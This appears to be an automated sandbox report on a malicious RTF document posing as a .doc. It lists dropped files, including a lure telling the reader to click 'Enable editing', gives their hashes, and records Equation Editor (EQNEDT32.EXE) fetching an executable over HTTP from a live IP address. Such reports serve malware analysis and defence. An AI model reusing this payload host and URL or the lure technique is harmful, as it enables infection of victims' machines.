SHA-512:FECE75341ADDCED5E64495A77C983B62D4A78A1CF9A74D39E92DD444A6D43E0C38742408DEF7F6224D0FB987E1DF51A6EEA248FA3438C8EA95AAD3F12108ED07
Malicious:false
Reputation:low
Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):273408
Entropy (8bit):3.4998710521395613
Encrypted:false
SSDEEP:6144:cyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemwSQ4:RD
MD5:28D0A320B46B9319A5E1CEB01D576526
SHA1:4658BE032D115E4191E451172521F2B6B6BED253
SHA-256:172E5F5CE0FC2E93DFDAEAB4FC9D587E09FB733F2D96DBF2BC45AB7A8E34435F
SHA-512:1F4ADC7E32E8E63F50420660FB5406787DC7386577BC1BCBDF03C6B1FBDC1A3CF065A7A9FBC3D9988ED0F7C24DF37B0BC365E3DA8DE45D1C328FE06DC897F1F8
Malicious:false
Reputation:low
Preview:3.3.4.7.7.1.5.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Dec 4 12:27:00 2024, length=788079, window=hide
Category:dropped
Size (bytes):1039
Entropy (8bit):4.545716493944241
Encrypted:false
SSDEEP:24:8olNn/XTcZxOaesLGHJeGpvACG5Dv3qo57u:8+Nn/XTML1LGHJ74CGQo9u
MD5:9D0F78CD9C648818D0703D16A1022A60
SHA1:1EE3CEBA58B5B1BF15E09A37C70DBD593C706A85
SHA-256:A28F1110D61A871D347CC8F96FF46D6681F1D6760037F7DA44CA5D0C1E83D870
SHA-512:CF21FB70D1E24301C441542D3A157EDC80FEEB82B6208645F286242C448EB284F70F3642FB71FB8E9D9D76D5A39F84E79117ABB335E9A3001DBCAF7082C9BDF1
Malicious:false
Preview:L..................F.... ...R...r...R...r......2PF..o............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Y\k..user.8......QK.X.Y\k*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.o....Yak .D1WN7M~1.DOC..T.......WC..WC.*.........................d.1.w.n.7.m.0.x.0.F.W.F.b.f.s...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\d1wn7m0x0FWFbfs.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.1.w.n.7.m.0.x.0.F.W.F.b.f.s...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..W.e8...8...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Generic INItialization configuration [folders]
Category:dropped
Size (bytes):64
Entropy (8bit):4.609069531114784
Encrypted:false
SSDEEP:3:M1i+wHiCm4qSBwHiCv:Mg+wCfSBwCs
MD5:6F623EA5C1BBE98DFAA061574747A97D
SHA1:BE61D2A539BF31502F08C3684BE474D6DDF44FD5
SHA-256:AF914553637FDAEA85344CD11FA709CE0C553991C86CD19D959598C34CDCE3F4
SHA-512:FE531443E0F5C87A5F6305C3C30B960401108FEF39968AC6B9CA5E43B6F2BEA7486EEBAD26B61CDA86414694038F5C2007A62F5553A05417F750E4257456BE60
Malicious:false
Preview:[doc]..d1wn7m0x0FWFbfs.LNK=0..[folders]..d1wn7m0x0FWFbfs.LNK=0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.4797606462020307
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Unicode text, UTF-16, little-endian text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.4797606462020307
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65258), with CR line terminators
Entropy (8bit):3.161780936097651
TrID:
  • Rich Text Format (4004/1) 100.00%
File name:d1wn7m0x0FWFbfs.doc
File size:788'079 bytes
MD5:06aa157e613bb060f325420c82c2bb60
SHA1:69a3f3245067abb4a98729317e2446154cd6b4ea
SHA256:41b2982fe12fa16b38670cbcfb26d89ebd89572c03687433467556fa6f920ade
SHA512:6db44bee0bb1dd3cd786954af7d73aa3d7941ffd8a86bf9dce7ea8d48ede446afb2f049a4899c009f695fe2cd0b529b9a4ac891af4aeea3e922ae3eea20cf9f0
SSDEEP:6144:AwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAC9Ax9KrYALihaT5OJcl:zCA
TLSH:AAF47A2DD34E0259DF624237AB5A1E5442FDBB7EF38551A0346C433933EE83DA2252B9
File Content Preview:{\rt..{\*\SaRpj4SghqHzoeZGoNRkKCC4mrOCYJ0gLU42rOKYcRM8C4jZWTbxalRSJI49eBvL3BXy3kKIBNfr5B2ivgcq3x4uruV8tpkZMLsYcJzJAJE4lAz7phXK1vdqDKh3aQzl2b7enEp1Lu4gW99Bz9MIkpef9Fhoz7CJseHDteOoVoEZeK3JCh8eXpemTIXKP3tcf7Q7BkD6QgkgPpCuF0uKe3Abw9EV5Pd7AgZHxeoIsAdt5o8OtjgDO
Icon Hash:2764a3aaaeb7bdbf
TimestampSource PortDest PortSource IPDest IP
Dec 4, 2024 14:27:08.007519007 CET4916180192.168.2.2287.120.84.39
Dec 4, 2024 14:27:08.127429008 CET804916187.120.84.39192.168.2.22
Dec 4, 2024 14:27:08.129232883 CET4916180192.168.2.2287.120.84.39
Dec 4, 2024 14:27:08.134319067 CET4916180192.168.2.2287.120.84.39
Dec 4, 2024 14:27:08.254851103 CET804916187.120.84.39192.168.2.22
Dec 4, 2024 14:27:30.023135900 CET804916187.120.84.39192.168.2.22
Dec 4, 2024 14:27:30.023205042 CET4916180192.168.2.2287.120.84.39
Dec 4, 2024 14:27:30.023329020 CET4916180192.168.2.2287.120.84.39
Dec 4, 2024 14:27:30.143625975 CET804916187.120.84.39192.168.2.22
  • 87.120.84.39
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.224916187.120.84.39803504C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
TimestampBytes transferredDirectionData
Dec 4, 2024 14:27:08.134319067 CET322OUTGET /txt/d1wn7m0x0FWFbfs.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 87.120.84.39
Connection: Keep-Alive


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:08:27:01
Start date:04/12/2024
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f8e0000
File size:1'423'704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:2
Start time:08:27:05
Start date:04/12/2024
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:0x400000
File size:543'304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:08:27:47
Start date:04/12/2024
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:0x400000
File size:543'304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Reset < >
    Memory Dump Source
    • Source File: 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1974d5a042449fd2412188167a7233bdf174a6d53088c237d58ec86bb149d3e1
    • Instruction ID: 9f3f4d0141994082677d281d426fb7e62f7de6e43765bb9c6ba69aaf0b557b8b
    • Opcode Fuzzy Hash: 1974d5a042449fd2412188167a7233bdf174a6d53088c237d58ec86bb149d3e1
    • Instruction Fuzzy Hash: 1D817A6648E3C06FD71B5B7048657917FB1AF2B248F1B59EBD0C1CF0A3E259498AC722
    Memory Dump Source
    • Source File: 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1d85d63fdc4545caf9c91ad433ab256bb755a5ace85e7ae5cbb2115101cc4fb2
    • Instruction ID: 59a2d36cee44d96732b3ac3377f1b24e03a75da2c1e06d31df90936b9705f674
    • Opcode Fuzzy Hash: 1d85d63fdc4545caf9c91ad433ab256bb755a5ace85e7ae5cbb2115101cc4fb2
    • Instruction Fuzzy Hash: C361FB2644E3D16FDB438BB869714A23FB58D2B20130E6AD7C1D0CF5F3D5285A5AE722
    Memory Dump Source
    • Source File: 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4b9eb2f186ec9e2db15a2fafa2d45dc21f45b0eeec0c7f28aa3f4ac9baf738d0
    • Instruction ID: 33633c4c7ac37760b90c27df2de623cb1fbe5246dca5b381419b67b90ff5cc55
    • Opcode Fuzzy Hash: 4b9eb2f186ec9e2db15a2fafa2d45dc21f45b0eeec0c7f28aa3f4ac9baf738d0
    • Instruction Fuzzy Hash: 7051F81504E3C8AFDB974BB448B56A67FB08E07200B1FA5DBD4D1CF4B3CA08484AE326